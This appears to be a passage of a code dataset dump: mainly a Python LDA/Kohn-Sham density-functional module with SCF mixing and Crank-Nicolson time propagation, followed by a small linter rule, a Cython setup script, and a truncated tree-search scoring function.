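note::\n\n The eigenproblem below is solved directly with scipy.linalg.eig_banded\n on the band-form Hamiltonian, so only the stored bands are needed.\n\n .. 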
math:: \n \n \\hat{H} \\phi_{j} = \\varepsilon_{j} \\phi_{j}\n\n parameters\n ----------\n pm : object\n Parameters object\n H : array_like\n 2D array of the Hamiltonian matrix in band form, indexed as H[band,space_index]\n\n returns\n -------\n density : array_like\n 1D array of the electron density, indexed as density[space_index]\n orbitals : array_like\n 2D array of the Kohn-Sham orbitals, index as orbitals[space_index,orbital_number]\n eigenvalues : array_like\n 1D array of the Kohn-Sham eigenvalues, indexed as eigenvalues[orbital_number]\n \"\"\"\n # Solve the Kohn-Sham equations\n eigenvalues, orbitals = spla.eig_banded(H, lower=True)\n \n # Normalise the orbitals\n orbitals /= np.sqrt(pm.space.delta)\n\n # Calculate the electron density\n density = electron_density(pm, orbitals)\n\n return density, orbitals, eigenvalues\n\n\ndef electron_density(pm, orbitals):\n r\"\"\"Calculates the electron density from the set of orbitals.\n\n .. math:: \n\n n(x) = \\sum_{j=1}^{N}|\\phi_{j}(x)|^{2}\n\n parameters\n ----------\n pm : object\n Parameters object\n orbitals : array_like\n 2D array of the Kohn-Sham orbitals, index as orbitals[space_index,orbital_number]\n\n returns\n -------\n density : array_like\n 1D array of the electron density, indexed as density[space_index]\n \"\"\"\n density = np.sum(np.absolute(orbitals[:,:pm.sys.NE])**2, axis=1)\n\n return density\n\n\ndef ks_potential(pm, density, perturbation=False):\n r\"\"\"Calculates the Kohn-Sham potential from the electron density.\n\n .. math::\n\n V_{\\mathrm{KS}} = V_{\\mathrm{ext}} + V_{\\mathrm{H}} + V_{\\mathrm{xc}}\n\n parameters\n ----------\n pm : object\n Parameters object\n density : array_like\n 1D array of the electron density, indexed as density[space_index]\n perturbation: bool\n - True: Perturbed external potential\n - False: Unperturbed external potential\n\n returns\n -------\n v_ks : array_like\n 1D array of the Kohn-Sham potential, indexed as v_ks[space_index]\n \"\"\"\n v_ks = pm.space.v_ext + hartree_potential(pm, density) + xc_potential(pm, density)\n if perturbation:\n v_ks += pm.space.v_pert\n\n return v_ks\n\n\ndef banded_to_full(pm, H):\n r\"\"\"Converts the Hamiltonian matrix in band form to the full matrix.\n\n parameters\n ----------\n pm : object\n Parameters object\n H : array_like\n 2D array of the Hamiltonian matrix in band form, indexed as H[band,space_index]\n\n returns\n -------\n H_full : array_like\n 2D array of the Hamiltonian matrix in full form, indexed as H_full[space_index,space_index]\n \"\"\"\n # Stencil used\n sd = pm.space.second_derivative_band\n nbnd = len(sd)\n\n # Add the band elements to the full matrix\n H_full = np.zeros((pm.space.npt,pm.space.npt), dtype=np.float)\n for ioff in range(nbnd):\n d = np.arange(pm.space.npt-ioff)\n H_full[d,d+ioff] = H[ioff,d]\n H_full[d+ioff,d] = H[ioff,d]\n\n return H_full\n\n\ndef kinetic(pm):\n r\"\"\"Stores the band elements of the kinetic energy matrix in lower form. The kinetic energy matrix \n is constructed using a three-point, five-point or seven-point stencil. This yields an NxN band \n matrix (where N is the number of grid points). For example with N=6 and a three-point stencil:\n \n .. 
math::\n\n K = -\\frac{1}{2} \\frac{d^2}{dx^2}= \n -\\frac{1}{2} \\begin{pmatrix} \n -2 & 1 & 0 & 0 & 0 & 0 \\\\ \n 1 & -2 & 1 & 0 & 0 & 0 \\\\ \n 0 & 1 & -2 & 1 & 0 & 0 \\\\ \n 0 & 0 & 1 & -2 & 1 & 0 \\\\ \n 0 & 0 & 0 & 1 & -2 & 1 \\\\ \n 0 & 0 & 0 & 0 & 1 & -2 \n \\end{pmatrix} \n \\frac{1}{\\delta x^2} \n = [\\frac{1}{\\delta x^2},-\\frac{1}{2 \\delta x^2}] \n\n parameters\n ----------\n pm : object\n Parameters object\n\n returns array_like\n 2D array containing the band elements of the kinetic energy matrix, indexed as \n K[band,space_index]\n \"\"\"\n # Stencil to use\n sd = pm.space.second_derivative_band\n nbnd = len(sd)\n\n # Band elements\n K = np.zeros((nbnd, pm.space.npt), dtype=np.float)\n for i in range(nbnd):\n K[i,:] = -0.5 * sd[i]\n\n return K\n\n\ndef hamiltonian(pm, v_ks=None, orbitals=None, perturbation=False):\n r\"\"\"Constructs the Hamiltonian matrix in band form for a given Kohn-Sham potential.\n\n .. math::\n\n \\hat{H} = \\hat{K} + \\hat{V}_{\\mathrm{KS}}\n\n parameters\n ----------\n pm : object\n Parameters object\n v_ks : array_like\n 1D array of the Kohn-Sham potential, indexed as v_ks[space_index]\n orbitals : array_like\n 2D array of the Kohn-Sham orbitals, index as orbitals[space_index,orbital_number]\n perturbation: bool\n - True: Perturbed external potential\n - False: Unperturbed external potential\n\n returns\n -------\n H : array_like\n 2D array of the Hamiltonian matrix in band form, indexed as H[band,space_index]\n \"\"\"\n # Kinetic energy matrix\n H = kinetic(pm)\n\n # Calculate the Kohn-Sham potential from the orbitals\n if orbitals is not None:\n density = electron_density(pm, orbitals)\n if perturbation:\n v_ks = ks_potential(pm, density, perturbation=True) \n else:\n v_ks = ks_potential(pm, density)\n\n # Add the Kohn-Sham potential to the Hamiltonian\n H[0,:] += v_ks\n\n return H\n\n\ndef hartree_potential(pm, density):\n r\"\"\"Calculates the Hartree potential for a given electron density.\n\n .. math::\n\n V_{\\mathrm{H}}(x) = \\int U(x,x') n(x') dx'\n\n parameters\n ----------\n pm : object\n Parameters object\n density : array_like\n 1D array of the electron density, indexed as density[space_index]\n\n returns array_like\n 1D array of the Hartree potential, indexed as v_h[space_index]\n \"\"\"\n v_h = np.dot(pm.space.v_int,density)*pm.space.delta\n\n return v_h\n\n\ndef hartree_energy(pm, v_h, density):\n r\"\"\"Calculates the Hartree energy of the ground-state system.\n\n .. math::\n\n E_{\\mathrm{H}}[n] = \\frac{1}{2} \\int \\int U(x,x') n(x) n(x') dx dx'\n = \\frac{1}{2} \\int V_{\\mathrm{H}}(x) n(x) dx\n\n parameters\n ----------\n pm : object\n Parameters object\n v_h : array_like\n 1D array of the ground-state Hartree potential, indexed as v_h[space_index]\n density : array_like\n 1D array of the ground-state electron density, indexed as density[space_index]\n\n returns float\n The Hartree energy of the ground-state system\n \"\"\"\n E_h = 0.5*np.dot(v_h,density)*pm.space.delta\n\n return E_h\n\n\ndef xc_energy(pm, n, separate=False):\n r\"\"\"LDA approximation for the exchange-correlation energy. Uses the LDAs developed in \n [Entwistle et al. 2018] from finite slab systems and the HEG.\n\n .. 
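note::\n\n For the finite LDAs the energy per electron is the polynomial fit\n (a + bn + cn^2 + dn^3 + en^4 + fn^5)n^g, with coefficients read from\n LDA_parameters.\n\n .. 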
math ::\n\n E_{\\mathrm{xc}}^{\\mathrm{LDA}}[n] = \\int \\varepsilon_{\\mathrm{xc}}(n) n(x) dx\n\n parameters\n ----------\n pm : object\n Parameters object\n n : array_like\n 1D array of the electron density, indexed as n[space_index]\n separate: bool\n - True: Split the HEG exchange-correlation energy into separate exchange and correlation terms\n - False: Just return the exchange-correlation energy \n\n returns float\n Exchange-correlation energy\n \"\"\"\n NE = pm.lda.NE\n\n # Finite LDAs\n if NE != 'heg':\n p = LDA_parameters.exc_lda[NE]\n e_xc = (p['a'] + p['b']*n + p['c']*n**2 + p['d']*n**3 + p['e']*n**4 + p['f']*n**5)*n**p['g']\n \n # HEG LDA\n else:\n p = LDA_parameters.ex_lda[NE]\n q = LDA_parameters.ec_lda[NE]\n e_x = np.zeros(pm.space.npt, dtype=np.float)\n e_c = np.copy(e_x)\n for j in range(pm.space.npt):\n if(n[j] != 0.0):\n\n # Exchange energy per electron\n e_x[j] = (p['a'] + p['b']*n[j] + p['c']*n[j]**2 + p['d']*n[j]**3 + p['e']*n[j]**4 + p['f']*n[j]**5)*n[j]**p['g']\n\n # Correlation energy per electron\n r_s = 0.5/n[j]\n e_c[j] = -((q['a']*r_s + q['e']*r_s**2)/(1.0 + q['b']*r_s + q['c']*r_s**2 + q['d']*r_s**3))*np.log(1.0 + \\\n q['f']*r_s + q['g']*r_s**2)/q['f']\n\n # Exchange-correlation energy per electron\n e_xc = e_x + e_c\n\n # Exchange-correlation energy\n E_xc = np.dot(e_xc, n)*pm.space.delta\n\n # Separate exchange and correlation contributions\n if separate == True:\n E_x = np.dot(e_x, n)*pm.space.delta\n E_c = np.dot(e_c, n)*pm.space.delta\n return E_xc, E_x, E_c\n else:\n return E_xc\n\n\ndef xc_potential(pm, n, separate=False):\n r\"\"\"LDA approximation for the exchange-correlation potential. Uses the LDAs developed in \n [Entwistle et al. 2018] from finite slab systems and the HEG.\n\n .. math ::\n\n V_{\\mathrm{xc}}^{\\mathrm{LDA}}(x) = \\frac{\\delta E_{\\mathrm{xc}}^{\\mathrm{LDA}}[n]}{\\delta n(x)}\n = \\varepsilon_{\\mathrm{xc}}(n(x)) + n(x)\\frac{d\\varepsilon_{\\mathrm{xc}}}{dn} \\bigg|_{n(x)}\n\n parameters\n ----------\n pm : object\n Parameters object\n n : array_like\n 1D array of the electron density, indexed as n[space_index]\n separate: bool\n - True: Split the HEG exchange-correlation potential into separate exchange and correlation terms\n - False: Just return the exchange-correlation potential \n\n returns array_like\n 1D array of the exchange-correlation potential, indexed as v_xc[space_index]\n \"\"\"\n NE = pm.lda.NE\n\n # Finite LDAs\n if NE != 'heg':\n p = LDA_parameters.vxc_lda[NE]\n v_xc = (p['a'] + p['b']*n + p['c']*n**2 + p['d']*n**3 + p['e']*n**4 + p['f']*n**5)*n**p['g']\n\n # HEG LDA\n else:\n p = LDA_parameters.vx_lda[NE]\n q = LDA_parameters.ec_lda[NE]\n v_x = np.zeros(pm.space.npt, dtype=np.float)\n v_c = np.copy(v_x)\n for j in range(pm.space.npt):\n if n[j] != 0.0:\n\n # Exchange potential\n v_x[j] = (p['a'] + p['b']*n[j] + p['c']*n[j]**2 + \\\n p['d']*n[j]**3 + p['e']*n[j]**4 + \\\n p['f']*n[j]**5)*n[j]**p['g']\n\n # Correlation potential\n r_s = 0.5/n[j]\n energy = -((q['a']*r_s + q['e']*r_s**2)/(1.0 + q['b']*r_s + q['c']*r_s**2 + q['d']*r_s**3))*\\\n np.log(1.0 + q['f']*r_s + q['g']*r_s**2)/q['f']\n derivative = ((r_s*(q['a'] + q['e']*r_s)*(q['b'] + r_s*(2.0*q['c'] + 3.0*q['d']*r_s))*np.log(1.0 + \\\n q['f']*r_s + q['g']*(r_s**2)) - (r_s*(q['a'] + q['e']*r_s)*(q['f'] + 2.0*q['g']*r_s)*\\\n (q['b']*r_s + q['c']*(r_s**2) + q['d']*(r_s**3) + 1.0)/(q['f']*r_s + q['g']*(r_s**2) + \\\n 1.0)) - ((q['a'] + 2.0*q['e']*r_s)*(q['b']*r_s + q['c']*(r_s**2) + q['d']*(r_s**3) + 1.0)*\\\n np.log(1.0 + q['f']*r_s + 
q['g']*(r_s**2))))/(q['f']*(q['b']*r_s + q['c']*(r_s**2) + \\\n q['d']*(r_s**3) + 1.0)**2))\n\n v_c[j] = energy - r_s*derivative\n \n # Exchange-correlation potential\n v_xc = v_x + v_c\n\n if separate == True:\n return v_xc, v_x, v_c\n else:\n return v_xc\n\n\ndef DXC(pm, n): \n r\"\"\"Calculates the derivative of the exchange-correlation potential, necessary for the RPA \n preconditioner.\n\n parameters\n ----------\n pm : object\n Parameters object\n n : array_like\n 1D array of the electron density, indexed as n[space_index]\n\n returns array_like\n 1D array of the derivative of the exchange-correlation potential, indexed as D_xc[space_index]\n \"\"\"\n NE = pm.lda.NE\n\n # Currently only the finite LDAs can be used\n if NE != 'heg':\n p = LDA_parameters.dlda[NE]\n D_xc = (p['a'] + n*(p['b'] + n*(p['c'] + n*(p['d'] + n*(p['e'] + n*p['f'])))))*(n**p['g'])\n else: \n raise IOError(\"Currently the HEG LDA is not implemented for the RPA preconditioner.\")\n\n return D_xc \n\n\ndef total_energy_eigv(pm, eigenvalues, orbitals=None, density=None, v_h=None, v_xc=None):\n r\"\"\"Calculates the total energy from the Kohn-Sham eigenvalues.\n\n .. math ::\n\n E[n] = \\sum_{j=1}^{N} \\varepsilon_j + E_{xc}[n] - E_H[n] - \\int n(x) V_{xc}(x)dx\n\n parameters\n ----------\n pm : object\n Parameters object\n eigenvalues : array_like\n 1D array of the Kohn-Sham eigenvalues, indexed as eigenvalues[orbital_number]\n orbitals : array_like\n 2D array of the Kohn-Sham orbitals, index as orbitals[space_index,orbital_number]\n density : array_like\n 1D array of the electron density, indexed as density[space_index]\n v_h : array_like\n 1D array of the Hartree potential, indexed as v_h[space_index]\n v_xc : array_like\n 1D array of the exchange-correlation potential, indexed as v_xc[space_index]\n\n returns float\n Total energy\n \"\"\"\n # Quantities needed to calculate the total energy\n if density is None:\n if orbitals is None:\n raise ValueError(\"Need to specify either density or orbitals\")\n else:\n density = electron_density(pm, orbitals)\n if v_h is None:\n v_h = hartree_potential(pm, density)\n if v_xc is None:\n v_xc = xc_potential(pm, density)\n\n # Kohn-Sham eigenvalues\n E = 0.0\n for j in range(pm.sys.NE):\n E += eigenvalues[j]\n\n # Hartree Energy\n E -= hartree_energy(pm, v_h, density)\n\n # Exchange-correlation potential term\n E -= np.dot(density, v_xc)*pm.space.delta\n \n # Exchange-correlation energy\n E += xc_energy(pm, density)\n\n return E.real\n\n\ndef total_energy_eigf(pm, orbitals, density=None, v_h=None):\n r\"\"\"Calculates the total energy from the Kohn-Sham orbitals.\n\n .. 
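note::\n\n Unlike total_energy_eigv, which starts from the Kohn-Sham eigenvalues,\n here the kinetic term is evaluated directly from the occupied orbitals\n via kinetic_energy.\n\n .. 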
math ::\n\n E[n] = \\sum_{j=1}^{N} \\langle \\phi_{j} | K | \\phi_{j} \\rangle + E_H[n] + E_{xc}[n] \n + \\int n(x) V_{\\mathrm{ext}}(x)dx\n\n parameters\n ----------\n pm : object\n Parameters object\n orbitals : array_like\n 2D array of the Kohn-Sham orbitals, index as orbitals[space_index,orbital_number]\n density : array_like\n 1D array of the electron density, indexed as density[space_index]\n v_h : array_like\n 1D array of the Hartree potential, indexed as v_h[space_index]\n\n returns float\n Total energy\n \"\"\"\n # Quantities needed to calculate the total energy\n if density is None:\n density = electron_density(pm, orbitals)\n if v_h is None:\n v_h = hartree_potential(pm, density)\n\n # Kinetic energy\n E = 0.0\n E += kinetic_energy(pm, orbitals)\n\n # Hartree energy\n E += hartree_energy(pm, v_h, density)\n\n # Exchange-correlation energy\n E += xc_energy(pm, density)\n\n # External potential term\n E += np.dot(pm.space.v_ext, density)*pm.space.delta\n\n return E.real\n\n\ndef kinetic_energy(pm, orbitals):\n r\"\"\"Calculates the kinetic energy from the Kohn-Sham orbitals.\n\n .. math ::\n\n T_{s}[n] = \\sum_{j=1}^{N} \\langle \\phi_{j} | K | \\phi_{j} \\rangle\n\n parameters\n ----------\n pm : object\n Parameters object\n orbitals : array_like\n 2D array of the Kohn-Sham orbitals, index as orbitals[space_index,orbital_number]\n\n \"\"\"\n # Kinetic energy matrix\n sd = pm.space.second_derivative\n sd_ind = pm.space.second_derivative_indices\n K = -0.5*sps.diags(sd, sd_ind, shape=(pm.space.npt, pm.space.npt), dtype=np.float, format='csr')\n\n # Kinetic energy of each occupied orbital\n occ = orbitals[:,:pm.sys.NE]\n eigenvalues = (occ.conj() * K.dot(occ)).sum(0)*pm.space.delta\n\n return np.sum(eigenvalues)\n\n\ndef calculate_current_density(pm, density):\n r\"\"\"Calculates the current density from the time-dependent electron density by solving the \n continuity equation.\n\n .. math:: \n\n \\frac{\\partial n}{\\partial t} + \\frac{\\partial j}{\\partial x} = 0\n\n parameters\n ----------\n pm : object\n Parameters object\n density : array_like\n 2D array of the time-dependent density, indexed as density[time_index,space_index]\n\n returns array_like\n 2D array of the current density, indexed as current_density[time_index,space_index]\n \"\"\"\n pm.sprint('', 1)\n string = 'LDA: calculating current density'\n pm.sprint(string, 1)\n current_density = np.zeros((pm.sys.imax,pm.space.npt), dtype=np.float)\n for i in range(1, pm.sys.imax):\n string = 'LDA: t = {:.5f}'.format(i*pm.sys.deltat)\n pm.sprint(string, 1, newline=False)\n J = np.zeros(pm.space.npt, dtype=np.float)\n J = RE_cython.continuity_eqn(pm, density[i,:], density[i-1,:])\n current_density[i,:] = J[:]\n pm.sprint('', 1)\n\n return current_density\n\n\ndef crank_nicolson_step(pm, orbitals, H_full):\n r\"\"\"Solves Crank Nicolson Equation\n\n .. 
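note::\n\n In the implementation below the band Hamiltonian has already been\n expanded to dense form, and the linear system is solved for all occupied\n orbitals at once with scipy.linalg.solve.\n\n .. 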
math::\n\n \\left(I + i\\frac{dt}{2} H\\right) \\Psi(x,t+dt) = \\left(I - i \\frac{dt}{2} H\\right) \\Psi(x,t)\n\n parameters\n ----------\n pm : object\n Parameters object\n orbitals : array_like\n 2D array of the Kohn-Sham orbitals, index as orbitals[space_index,orbital_number]\n H_full : array_like\n 2D array of the Hamiltonian matrix in full form, indexed as H_full[space_index,space_index]\n\n returns\n \"\"\"\n # Construct matrices\n dH = 0.5j*pm.sys.deltat*H_full\n identity = np.identity(pm.space.npt, dtype=np.cfloat)\n A = identity + dH\n Abar = identity - dH\n \n # Solve for all single-particle states at once\n RHS = np.dot(Abar, orbitals[:, :pm.sys.NE])\n orbitals_new = spla.solve(A, RHS)\n\n return orbitals_new\n\n\ndef main(parameters):\n r\"\"\"Performs LDA calculation\n\n parameters\n ----------\n parameters : object\n Parameters object\n\n returns object\n Results object\n \"\"\"\n # Array initialisations \n pm = parameters\n string = 'LDA: constructing arrays'\n pm.sprint(string, 1) \n pm.setup_space()\n\n # Take external potential as the initial guess to the Kohn-Sham potential\n H = hamiltonian(pm, v_ks=pm.space.v_ext)\n n_inp, orbitals, eigenvalues = groundstate(pm, H)\n E = total_energy_eigv(pm, eigenvalues=eigenvalues, density=n_inp)\n\n # Need n_inp and n_out to start mixing\n H = hamiltonian(pm, v_ks=ks_potential(pm, n_inp))\n n_out, orbitals_out, eigenvalues_out = groundstate(pm, H)\n\n # Mixing scheme\n if pm.lda.scf_type == 'pulay':\n mixer = mix.PulayMixer(pm, order=pm.lda.pulay_order, preconditioner=pm.lda.pulay_preconditioner)\n elif pm.lda.scf_type == 'cg':\n minimizer = minimize.CGMinimizer(pm, total_energy_eigf)\n elif pm.lda.scf_type == 'mixh':\n minimizer = minimize.DiagMinimizer(pm, total_energy_eigf)\n H_mix = copy.copy(H)\n\n # Find the self-consistent solution\n iteration = 1\n converged = False\n while (not converged) and iteration <= pm.lda.max_iter:\n E_old = E\n\n # Conjugate-gradient minimization starts with orbitals, H[orbitals]\n if pm.lda.scf_type == 'cg':\n\n orbitals = minimizer.step(orbitals, banded_to_full(pm, H))\n n_inp = electron_density(pm, orbitals)\n\n # Calculate total energy at n_inp\n E = total_energy_eigf(pm, orbitals=orbitals, density=n_inp)\n\n # Minimization that mixes Hamiltonian directly starts with n_inp, H[n_inp]\n elif pm.lda.scf_type == 'mixh':\n\n n_tmp, orbitals_tmp, eigenvalues_tmp = groundstate(pm,H_mix)\n H_tmp = hamiltonian(pm, v_ks=ks_potential(pm, n_tmp))\n\n H_mix = minimizer.h_step(H_mix, H_tmp)\n n_inp, orbitals_inp, eigenvalues_inp = groundstate(pm,H_mix)\n\n # Calculate total energy at n_inp\n E = total_energy_eigv(pm, eigenvalues=eigenvalues_inp, density=n_inp)\n\n # Mixing schemes starting with n_inp, n_out (Pulay, linear or none)\n else:\n\n # Calculate new n_inp\n if pm.lda.scf_type == 'pulay':\n n_inp = mixer.mix(n_inp, n_out, eigenvalues_out, orbitals_out.T)\n elif pm.lda.scf_type == 'linear':\n n_inp = (1-pm.lda.mix)*n_inp + pm.lda.mix*n_out\n else:\n n_inp = n_out\n\n # Calculate total energy at n_inp\n E = total_energy_eigv(pm, eigenvalues=eigenvalues_out, density=n_inp)\n\n # Calculate new Kohn-Sham potential and update the Hamiltonian\n v_ks = ks_potential(pm, n_inp)\n H = hamiltonian(pm, v_ks=v_ks)\n\n # Calculate new n_out\n n_out, orbitals_out, eigenvalues_out = groundstate(pm,H)\n\n # Calculate the Kohn-Sham gap\n gap = eigenvalues_out[pm.sys.NE]- eigenvalues_out[pm.sys.NE-1]\n if gap < 1e-3:\n string = \"\\nLDA: Warning: small KS gap {:.3e} Ha. 
Convergence may be slow.\".format(gap)\n pm.sprint(string, 1)\n\n # Calculate the self-consistent density and energy error\n dn = np.sum(np.abs(n_inp-n_out))*pm.space.delta\n dE = E - E_old\n\n # Check if converged\n converged = dn < pm.lda.tol and np.abs(dE) < pm.lda.etol\n string = 'LDA: E = {:.8f} Ha, de = {:+.3e}, dn = {:.3e}, iter = {}'.format(E, dE, dn, iteration)\n pm.sprint(string, 1, newline=False)\n\n # Iterate\n iteration += 1\n\n iteration -= 1\n pm.sprint('')\n\n # Print to screen\n if not converged:\n string = 'LDA: Warning: convergence not reached in {} iterations. Terminating.'.format(iteration)\n pm.sprint(string, 1)\n else:\n pm.sprint('LDA: reached convergence in {} iterations.'.format(iteration),0)\n\n # Self-consistent solution\n density = n_out\n orbitals = orbitals_out\n eigenvalues = eigenvalues_out\n \n # Calculate potentials and energies\n if pm.lda.NE == 'heg':\n E_xc, E_x, E_c = xc_energy(pm, density, separate=True)\n v_xc, v_x, v_c = xc_potential(pm, density, separate=True)\n else:\n E_xc = xc_energy(pm, density)\n v_xc = xc_potential(pm, density)\n v_h = hartree_potential(pm, density)\n v_ks = pm.space.v_ext + v_h + v_xc\n E = total_energy_eigf(pm, orbitals=orbitals, density=density)\n E_h = hartree_energy(pm, v_h, density)\n E_hxc = E_h + E_xc\n\n # Print to screen\n pm.sprint('LDA: ground-state energy: {}'.format(E),1)\n pm.sprint('LDA: ground-state Hartree exchange-correlation energy: {}'.format(E_hxc),1)\n pm.sprint('LDA: ground-state Hartree energy: {}'.format(E_h),1)\n pm.sprint('LDA: ground-state exchange-correlation energy: {}'.format(E_xc),1)\n if pm.lda.NE == 'heg':\n pm.sprint('LDA: ground-state exchange energy: {}'.format(E_x),1)\n pm.sprint('LDA: ground-state correlation energy: {}'.format(E_c),1)\n\n # Save the quantities to file\n results = rs.Results()\n results.add(density, 'gs_lda{}_den'.format(pm.lda.NE))\n results.add(v_h, 'gs_lda{}_vh'.format(pm.lda.NE))\n results.add(v_xc, 'gs_lda{}_vxc'.format(pm.lda.NE))\n results.add(v_ks, 'gs_lda{}_vks'.format(pm.lda.NE))\n results.add(E, 'gs_lda{}_E'.format(pm.lda.NE))\n results.add(E_xc, 'gs_lda{}_Exc'.format(pm.lda.NE))\n results.add(E_h, 'gs_lda{}_Eh'.format(pm.lda.NE))\n results.add(E_hxc, 'gs_lda{}_Ehxc'.format(pm.lda.NE))\n if pm.lda.NE == 'heg' :\n results.add(E_x, 'gs_lda{}_Ex'.format(pm.lda.NE))\n results.add(E_c, 'gs_lda{}_Ec'.format(pm.lda.NE))\n results.add(v_x, 'gs_lda{}_vx'.format(pm.lda.NE))\n results.add(v_c, 'gs_lda{}_vc'.format(pm.lda.NE))\n results.add(orbitals.T,'gs_lda{}_eigf'.format(pm.lda.NE))\n results.add(eigenvalues,'gs_lda{}_eigv'.format(pm.lda.NE))\n if pm.run.save:\n results.save(pm)\n\n # Propagate through real time\n if pm.run.time_dependence:\n\n # Construct arrays\n v_ks_td = np.zeros((pm.sys.imax,pm.space.npt), dtype=np.float)\n v_xc_td = np.zeros((pm.sys.imax,pm.space.npt), dtype=np.float)\n v_h_td = np.zeros((pm.sys.imax,pm.space.npt), dtype=np.float)\n current = np.zeros((pm.sys.imax,pm.space.npt), dtype=np.float)\n density_td = np.zeros((pm.sys.imax,pm.space.npt), dtype=np.float)\n orbitals = orbitals.astype(np.cfloat)\n\n # Save the ground-state\n v_ks_td[0,:] = v_ks[:]\n v_h_td[0,:] = v_h[:]\n v_xc_td[0,:] = v_xc[:]\n density_td[0,:] = density[:]\n\n # Perform real time iterations\n for i in range(1, pm.sys.imax):\n\n # Print to screen \n string = 'LDA: evolving through real time: t = {}'.format(i*pm.sys.deltat)\n pm.sprint(string, 1, newline=False)\n\n # Construct the Hamiltonian\n H = hamiltonian(pm, orbitals=orbitals, perturbation=True)\n H_full = 
banded_to_full(pm, H)\n\n # Propagate through time-step using the Crank-Nicolson method \n orbitals[:, :pm.sys.NE] = crank_nicolson_step(pm, orbitals, H_full)\n density_td[i,:] = electron_density(pm, orbitals)\n\n # Hartree and exchange-correlation potentials (each computed once per time-step)\n v_h_td[i,:] = hartree_potential(pm, density_td[i,:])\n v_xc_td[i,:] = xc_potential(pm, density_td[i,:])\n v_ks_td[i,:] = pm.space.v_ext[:] + pm.space.v_pert[:] + v_h_td[i,:] + v_xc_td[i,:]\n\n # Calculate the current density\n current_density = calculate_current_density(pm, density_td)\n \n # Save the quantities to file\n results.add(v_ks_td, 'td_lda{}_vks'.format(pm.lda.NE))\n results.add(v_h_td, 'td_lda{}_vh'.format(pm.lda.NE))\n results.add(v_xc_td, 'td_lda{}_vxc'.format(pm.lda.NE))\n results.add(density_td, 'td_lda{}_den'.format(pm.lda.NE))\n results.add(current_density, 'td_lda{}_cur'.format(pm.lda.NE))\n if pm.run.save:\n results.save(pm)\n\n pm.sprint('',1)\n\n return results\n","sub_path":"iDEA/LDA.py","file_name":"LDA.py","file_ext":"py","file_size_in_byte":27181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"621025292","text":"from oelint_adv.cls_rule import Rule\n\n\nclass NoCommentsTrailing(Rule):\n def __init__(self):\n super().__init__(id=\"oelint.comments.notrailing\",\n severity=\"error\",\n message=\"Comments shall be put on separate lines\")\n\n def check(self, _file, stash):\n res = []\n items = stash.GetItemsFor(filename=_file)\n for i in items:\n if i.Raw:\n for line in i.Raw.split(\"\\n\"):\n line = line.strip()\n if \"#\" in line and line.find(\"#\") > 0:\n res += self.finding(i.Origin, i.InFileLine)\n return res\n","sub_path":"oelint_adv/rule_base/rule_comment_notraling.py","file_name":"rule_comment_notraling.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"281643395","text":"import numpy as np\nfrom distutils.core import setup\nfrom distutils.extension import Extension\nfrom Cython.Distutils import build_ext\n# from Cython.Build import cythonize\n\next_modules = [Extension(\n name=\"js_sc\",\n sources=[\"js_sc.pyx\", \"c_js_sc.cpp\"],\n # extra_objects=[\"fc.o\"], # if you compile fc.cpp separately\n include_dirs = [np.get_include()], # .../site-packages/numpy/core/include\n language=\"c++\",\n # libraries=\n # extra_compile_args = \"...\".split(),\n # extra_link_args = \"...\".split()\n )]\n\nsetup(\n name = 'js_sc',\n cmdclass = {'build_ext': build_ext},\n ext_modules = ext_modules,\n)\n\n","sub_path":"js_sc-setup.py","file_name":"js_sc-setup.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"72687380","text":"from math import exp, sqrt, log, fabs\nfrom random import random, choice, seed, shuffle\n\n#from ParameterObject import depthscale\n#depthlimit = len(depthscale)+500000\ndepthlimit = 500000 # fallback depth cap, assumed here because the depthscale import above is commented out\n#========================================================\ndef UBEnergy(nodelist, exploreconstant, verbose):\n #Compute the average uniqueness factor\n uniqscore = [1.0 for x in nodelist]\n for i, node in enumerate(nodelist):\n visits = node.getvisits()\n score = node.getuniquenessdata(nodelist)\n uniqscore[i] = sqrt(visits/score)\n# uniqscore[0] = 0.0\n\n# maxval = max(uniqscore)\n# try:\n# uniqscore = [1.5*x/maxval for x in uniqscore]\n# except ZeroDivisionError:\n# uniqscore = [0.0 for node in nodelist]\n keylist = {}\n for i, node 
in enumerate(nodelist):\n keylist[str(node)] = uniqscore[i]\n\n selection = sorted(nodelist, key=lambda x:x.getid())\n selection = sorted(selection, key=lambda x:UCT_Unique_Score(x, keylist[str(x)], exploreconstant, doprint=True))[-1]\n print(\"Selecting Node %s with Score: %s\"%(selection.getid(), UCT_Unique_Score(selection, keylist[str(selection)], exploreconstant, doprint=True) ))\n return selection\n#==========================================================\n\ndef UCT_Unique_Score(node, uniqval, exploreconstant, doprint=False):\n \n parent = node.getparent()\n energy = node.getscore()\n visits = node.getvisits()\n# nChildren = len(node.getchildren())\n if parent is None:\n# return -1e30\n parenergy = node.getscore()\n parvisits = visits\n else:\n parenergy = parent.getscore()\n parvisits = parent.getvisits()\n\n\n depth = node.getdepth()\n# _, playoutEList = node.getplayouts()\n _, playoutEList = node.getallplayouts()\n# usedlist = node.getusedlist()\n# playoutEList = node.getenergylist()\n childeng = [child.getscore() for child in node.getnodelist()]\n nodeEnergy = node.getscore()\n nodeweight = nodeEnergy\n# scalefunc = lambda x: log(x, 10.0)\n# scalefunc = lambda x: sqrt(x)\n scalefunc = lambda x: x\n if visits < 10:\n exploitweight = scalefunc(nodeweight)\n else:\n exploitweight = 1e300\n cnt = 1\n# if len(childeng) > 0:\n# for energy in childeng:\n# exploitweight = min(exploitweight, scalefunc(energy))\n# exploitweight += energy\n# cnt += 1\n if len(playoutEList) > 0:\n for i, energy in enumerate(playoutEList):\n exploitweight = min(exploitweight, scalefunc(energy))\n# exploitweight += energy\n# cnt += 1\n exploitweight = exploitweight/cnt\n explore = 0.0\n try:\n explore = uniqval*sqrt(log(parvisits)/visits)\n except (ValueError, ZeroDivisionError):\n explore = uniqval\n\n score = -exploitweight + exploreconstant*explore\n if parent is not None:\n node.setexploitvalue(-exploitweight)\n node.setexplorevalue(explore)\n if depth > depthlimit or (parent is None):\n if doprint:\n try:\n print(\"Node %s (Parent:%s, Depth %s, Visits:%s): Exploit: %s Score:%s\"%(node.getid(), parent.getid(), depth, visits, -exploitweight, -1e20))\n except AttributeError:\n # parent is None at the head node, so parent.getid() is unavailable\n print(\"Node %s (Parent:Head, Depth %s, Visits:%s): Exploit: %s 